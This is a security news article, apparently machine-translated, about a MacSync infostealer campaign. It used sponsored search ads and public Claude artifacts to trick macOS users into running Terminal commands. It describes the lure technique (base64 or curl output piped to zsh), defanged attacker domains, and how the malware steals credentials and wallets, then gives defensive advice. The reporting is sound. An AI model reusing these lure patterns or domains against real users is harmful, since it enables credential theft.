The combined IA scam and ads that steal data in macOS

In recent weeks, a campaign has been detected that combines two very current vectors: results sponsored by search engines and public content generated by language models. The attackers have managed to position ads on Google that point to guides hosted in Claude or to pages that mimic Apple technical support, with the intention that macOS users run on Terminal commands that install a infostealer known as MacSync.

A Claude "artifact" is simply an output of the model (instructions, code fragments or guides) that its author publishes as a public resource accessible through a link in the claude.ai. domain. These pages include a notice that the content was generated by a user and has not been verified, but that did not prevent malicious actors from using it as a vector to deceive people looking for concrete technical solutions.

Researchers of the MacPaw research laboratory, Moonlock Lab, and analysts of the AdGuard ad blocking company identified the manipulated results linked to searches such as "online DNS solve," "macOS CLI disk space analyzer" and "HomeBrew." The malicious links lead well to a public artifact in Claude, or to an article in Medium that passes through Apple support; in both cases the goal is the same: to convince the user to paste a command in Terminal and press Enter.

At least two variants of deception have been observed. One is indicated to run a chain that decodes and passes directly to zsh by something equivalent to a pipe from base64; the other is encouraged to use a curl that downloads a script from a URL controlled by the attacker and runs it with zsh. To avoid spreading active dominoes, researchers reveal these addresses with replaced points (e.g. raxelpak [.] com and a2abotnet [.] com). The result of running these commands is the download of a loader that unfolds the MacSync infostealer.

According to technical analysis published by researchers, malware establishes communication with command and control infrastructure using credentials embedded in the code itself, falsifies the user agent of a browser in macOS to appear legitimate traffic and, most dangerous, uses osascript(AppleScript) to access and extract sensitive data: keys, credentials saved in browsers and cryptomoneda coins. The collected information is packed in a temporary file (e.g. / tmp / osalogging.zip) and sent to the attacker server by HTTP POST requests; if the upload fails the file is fragmented and retried several times before malware cleans the traces.

The scope is worrying: Moonlock Lab reported that the malicious guide published in Claude accumulated tens of thousands of visits (researchers reported figures above 15,000 visualizations), and AdGuard detected the same publication with more than 12,000 visits a few days earlier. These metrics give an idea of how many people may have been exposed to deception. Moonlock Lab shared his findings publicly on X, which allows to review the exchange of alerts and technical evidence in context: Moonlock Lab thread. They have also provided specialized media coverage that have documented the technique and device used.

This type of campaign is not an isolated development: attackers have already been documented using shared conversations from other major models such as ChatGPT or Grok to distribute infostealers (e.g. the AMOS family). What this case shows is that the abuse is spreading to different LLM platforms and that combining paid results in search engines with public IA content can increase the visibility of lures.

In view of this situation, very specific precautions should be taken. Don't hit on Terminal commands you don't fully understand and distrust pages that ask you to run "fast" recipes by copying and hitting. If you found the command in an output of a chatbot or in an online guide, a good practice is to ask in the same conversation that the model itself explains, step by step and in detail, what that command does and what risks it implies; security teams like Kaspersky have exactly recommended that check as an initial filter against the so-called "pastejacking" or malicious guides. For safety queries in macOS, also check the official Apple documentation and recognized security sources before running instructions.

In addition to user caution, there are measures that help mitigate the risk in the equipment: keep macOS up-to-date, activate system protections such as Gatekeeper and notarization, use security solutions for endpoints and review application permissions and key access. For managers and security officials, it is relevant to monitor suspicious outgoing traffic and block known C2 domains, as well as work with networks and advertising platforms to mitigate the emergence of ads that target malicious content.

Finally, this incident raises a greater question: platforms that allow for sharing model outputs and ad networks must improve their verification mechanisms to prevent generated or promoted content from being used as an infection vector. As these protections evolve, the best defense will continue to be the combination of user awareness, good basic safety practices and the use of reliable sources to learn or execute any technical instruction.

For those who want to deepen the original reports, you can read the technical coverage and analysis published by media and teams that investigated the campaign, such as the Moonlock Lab report and the notes of security and ad blocking companies: in addition to Claude's own platform ( claude.ai), see the publications of MacPaw / Moonlock Lab the safety section of BleepingComputer and the blog of AdGuard to contextualize findings and follow mitigation recommendations.